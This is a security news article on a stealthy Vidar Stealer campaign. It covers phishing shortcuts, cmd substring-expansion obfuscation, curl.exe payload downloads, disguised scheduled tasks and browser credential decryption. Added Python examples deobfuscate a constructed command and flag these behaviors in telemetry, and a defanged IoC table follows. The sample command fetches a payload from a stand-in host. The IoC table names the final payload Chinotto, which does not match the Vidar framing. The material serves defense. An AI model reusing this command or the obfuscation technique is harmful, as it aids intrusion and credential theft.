New Stealthy Vidar Stealer Campaign Bypasses EDR and Steals Credentials

Cybersecurity News · Archived May 12, 2026

By Tushar Subhra Dutta, May 12, 2026

A new and highly stealthy campaign distributing Vidar Stealer has surfaced, targeting Windows users with a sophisticated attack chain designed to slip past endpoint defenses and harvest sensitive credentials. The campaign has drawn significant attention from the cybersecurity community because of how quietly it operates, often completing its theft before the victim ever realizes anything is wrong.

Vidar Stealer is a well-known information-stealing malware that first appeared in 2018 as a derivative of the Arkei stealer. Over the years, it has evolved into a powerful tool capable of extracting browser passwords, session cookies, cryptocurrency wallet data, authentication tokens, and autofill information stored locally on infected machines. The latest campaign takes that capability further by incorporating advanced evasion mechanisms that allow it to bypass modern Endpoint Detection and Response tools with notable consistency.

Security researchers at Genians Security Center identified the campaign and noted that it relies on multi-stage delivery techniques, obfuscated script execution, and the abuse of legitimate system tools to avoid raising alarms.

Figure: Attack Flow of Police Official Impersonation Case (Source – Genians)

The campaign’s ability to blend into normal system activity makes it particularly dangerous for organizations that rely on traditional signature-based detection methods alone.

Initial access is achieved through spear-phishing emails carefully tailored to match the recipient’s professional context and interests. These messages carry ZIP-compressed attachments containing Windows shortcut files disguised as legitimate work documents. When a target opens the attachment and runs the shortcut file, an obfuscated command is quietly triggered in the background without showing any visible signs to the user.
EDR Bypass Through Layered Obfuscation

The malware then begins a chain of secondary payload downloads, eventually deploying its core information-stealing component onto the compromised system. Since each stage uses environment variable-based obfuscation to reconstruct commands only at runtime, static analysis tools often fail to identify the malicious intent until it is far too late for the victim to respond.

Figure: Deobfuscated Batch File Commands (Source – Genians)

One of the most notable aspects of this campaign is how it avoids triggering behavior-based detection systems. The threat actor uses environment variable-based substring expansion to split and reassemble commands character by character, so the full command string never appears in plaintext during execution. This technique forces security tools to evaluate each fragment individually rather than recognizing the full malicious intent behind the instruction.

The attack also abuses curl.exe, a native Windows binary, to download additional payloads from remote servers. Using built-in operating system tools in this way is a tactic known as Living-off-the-Land, which is harder to flag because the tools themselves are legitimate system components. A Python Embed package is retrieved from a trusted external source to create a silent execution environment, reducing the suspicion tied to outbound network activity throughout the infection process.

A scheduled task is then created under a name crafted to resemble a legitimate Microsoft system process, ensuring the malware persists across reboots and continues running at one-minute intervals. The final payload, a compiled Python bytecode file disguised with a .cat extension, functions as a remote access backdoor capable of executing commands, collecting files, and exfiltrating system data to attacker-controlled infrastructure.
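The substring-expansion trick described above can be undone offline when an analyst knows the victim's environment values. The following Python is an added example, not code from the article or from Genians; the environment values and the sample command are constructed to resemble a default Windows install and are not the campaign's actual batch content.

```python
import re

# Matches %VAR%, %VAR:~start% and %VAR:~start,len% (cmd.exe substring expansion).
VAR_RE = re.compile(r"%([A-Za-z_][A-Za-z0-9_]*)(?::~(-?\d+)(?:,(-?\d+))?)?%")

# Constructed environment values typical of a default Windows install (assumption).
CONSTRUCTED_ENV = {
    "COMSPEC": r"C:\Windows\system32\cmd.exe",
    "PUBLIC": r"C:\Users\Public",
    "PROGRAMFILES": r"C:\Program Files",
}

# Constructed sample of the technique: each letter of "curl" is sliced out of a
# different variable, so "curl" never appears literally in the stored command.
SAMPLE = (r"%COMSPEC:~20,-4% /c %COMSPEC:~20,1%%PUBLIC:~10,1%%PROGRAMFILES:~4,1%"
          r"%PUBLIC:~12,1%.exe -o %PUBLIC%\stage2.cab http://c2.example.invalid/p")

def _slice(value, start, length):
    """Reproduce cmd.exe %VAR:~start,len% semantics, including negative offsets."""
    n = len(value)
    if start < 0:
        start = max(n + start, 0)
    if length is None:            # %VAR:~start% runs to the end of the value
        return value[start:]
    if length < 0:                # negative len counts back from the end
        return value[start:n + length] if n + length > start else ""
    return value[start:start + length]

def expand_substrings(command, env):
    """Resolve expansions against env; unknown variables are left in place."""
    def repl(m):
        name, start, length = m.groups()
        value = env.get(name.upper())
        if value is None:
            return m.group(0)                     # keep visible for the analyst
        if start is None:
            return value                          # plain %VAR%
        return _slice(value, int(start), None if length is None else int(length))
    return VAR_RE.sub(repl, command)

def obfuscation_score(command):
    """Count substring-expansion fragments; many fragments in one line is a hint."""
    return sum(1 for m in VAR_RE.finditer(command) if m.group(2) is not None)

if __name__ == "__main__":
    print("score:", obfuscation_score(SAMPLE))
    print("expanded:", expand_substrings(SAMPLE, CONSTRUCTED_ENV))
```

Because cmd.exe expands these fragments itself, the reassembled string also shows up in process-creation telemetry of the child process, which is where behavior-based detection should look.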
Credential Theft and Its Broader Impact

Vidar’s core function in this campaign is extracting user credentials and other sensitive data stored within Chromium-based browsers and similar applications. It targets locally stored passwords, session cookies, and the encrypted key files that browsers use to protect login data from unauthorized access. The malware uses the Windows CryptUnprotectData API to decrypt these keys directly from the browser’s Local State file, granting it full access to saved credentials.

Figure: Comparison of Similarities in XOR String Obfuscation (Source – Genians)

Multiple command-and-control domains were identified during the investigation, spread across different countries and hosting providers, making infrastructure-based blocking considerably more difficult for defenders. The campaign’s reach across various sectors highlights just how broadly these credential theft tools are being deployed.

Organizations are advised to strengthen behavior-based EDR capabilities to detect obfuscated script execution and multi-stage download activity. Blocking shortcut file execution from within archives, auditing scheduled tasks regularly, and avoiding saving credentials directly in browsers are concrete steps that can meaningfully reduce exposure to this growing threat.
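The behaviors the article recommends watching for (curl.exe downloads from a shell, a renamed Python host, a Microsoft-lookalike task on a one-minute schedule, and a non-browser process reading the Local State file) can be expressed as simple rules over endpoint telemetry. The Python below is an added example and not code from the article or Genians; the event records are constructed in a simplified Sysmon-like shape, and the benign entries are invented for contrast.

```python
import os

BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe"}
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files")

# Constructed sample telemetry (not a real log format); the malicious entries
# reuse file and task names from the article's IoC table for illustration.
EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\curl.exe", "parent": "cmd.exe",
     "original_filename": "curl.exe", "cmdline": r"curl.exe -o C:\Users\Public\stage2.cab http://c2.example.invalid/p"},
    {"type": "process", "image": r"C:\Users\Public\codeflush.exe", "parent": "cmd.exe",
     "original_filename": "pythonw.exe", "cmdline": "codeflush.exe settingenv.cat"},
    {"type": "task", "name": "MicrosoftMusicLibrariesPackageTaskMachine",
     "interval_min": 1, "action": r"C:\Users\Public\codeflush.exe"},
    {"type": "file_read", "image": r"C:\Users\Public\codeflush.exe",
     "path": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Local State"},
    {"type": "file_read", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "path": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Local State"},
    {"type": "task", "name": "MicrosoftEdgeUpdateTaskMachineCore",
     "interval_min": 60, "action": r"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"},
]

def _base(path):
    return os.path.basename(path.replace("\\", "/")).lower()

def check_event(ev):
    """Return (rule, detail) hits for one event; an empty list means nothing fired."""
    hits = []
    if ev["type"] == "process":
        orig = ev.get("original_filename", "").lower()
        # Rule 1: curl.exe spawned by a shell and told to write a file to disk
        if orig == "curl.exe" and ev["parent"].lower() == "cmd.exe" \
                and (" -o " in ev["cmdline"] or "--output" in ev["cmdline"]):
            hits.append(("lolbin_download", ev["cmdline"]))
        # Rule 2: version info says pythonw.exe but the file on disk has another name
        if orig == "pythonw.exe" and _base(ev["image"]) != orig:
            hits.append(("renamed_python_host", ev["image"]))
    elif ev["type"] == "task":
        # Rule 3: Microsoft-looking name, one-minute repetition, action outside trusted dirs
        trusted = ev["action"].lower().startswith(TRUSTED_DIRS)
        if ev["name"].lower().startswith("microsoft") and ev["interval_min"] <= 1 and not trusted:
            hits.append(("lookalike_persistence", ev["name"]))
    elif ev["type"] == "file_read":
        # Rule 4: a non-browser process reads the file that stores the encrypted key
        if ev["path"].lower().endswith(r"\user data\local state") and _base(ev["image"]) not in BROWSERS:
            hits.append(("browser_key_access", ev["image"]))
    return hits

def scan(events):
    return [hit for ev in events for hit in check_event(ev)]
```

Running scan(EVENTS) fires each rule exactly once on the constructed data while the legitimate Chrome read and the hourly Edge update task stay quiet.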
Indicators of Compromise (IoCs):

| Type | Indicator | Description |
| --- | --- | --- |
| Domain | kmot.co[.]kr | Korea-based C2 server hosting malicious payloads |
| Domain | haeundaejugong[.]com | C2 server used to collect and exfiltrate user data |
| Domain | kumdo[.]org | Secondary C2 server for data exfiltration |
| Domain | nls5950.cafe24[.]com | C2 infrastructure used in related malicious activity |
| Domain | hanainternational[.]net | C2 domain linked to threat actor infrastructure |
| Domain | mlgpf.ir114[.]net | C2 domain associated with campaign |
| Domain | luminix[.]kr | C2 domain identified in related malicious files |
| Domain | sunlin[.]org | C2 domain observed in threat actor infrastructure |
| Domain | ezvm[.]kr | C2 domain linked to malicious distribution |
| Domain | intobiz[.]kr | C2 domain used in campaign infrastructure |
| Domain | choisy[.]fr | France-based C2 server observed in attack chain |
| Domain | printory[.]kr | Domain used to host compiled Python bytecode malware |
| Domain | udcontest[.]com | Domain hosting webshell used in phishing attack |
| Domain | ableinfo.co[.]kr | Distribution infrastructure for malicious files |
| IP Address | 114.207.246[.]156 | IP address shared across multiple attack domains |
| File Name | settingenv.cat | Compiled Python bytecode payload disguised as Windows catalog file |
| File Name | codeflush.exe | Renamed pythonw.exe used as stealthy malware execution host |
| File Name | GX)/M27s.bat | Obfuscated batch file used for secondary payload execution |
| File Name | ms3360.bat | Batch file variant used in obfuscated execution chain |
| File Name | yS1825.bat | Batch file variant identified in attack chain |
| File Name | K3772.bat | Batch file variant used in environment variable obfuscation |
| File Name | HqcUpdate.exe | Final information-stealing payload (Chinotto) |
| File Name | WStep163.cab | Obfuscated Python script downloaded from C2 server |
| File Name | MicroAppsTemp28h2.bat | Batch file downloaded from C2 for follow-up activity |
| Scheduled Task | MicrosoftMusicLibrariesPackageTaskMachine | Persistence mechanism disguised as legitimate Microsoft task |

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.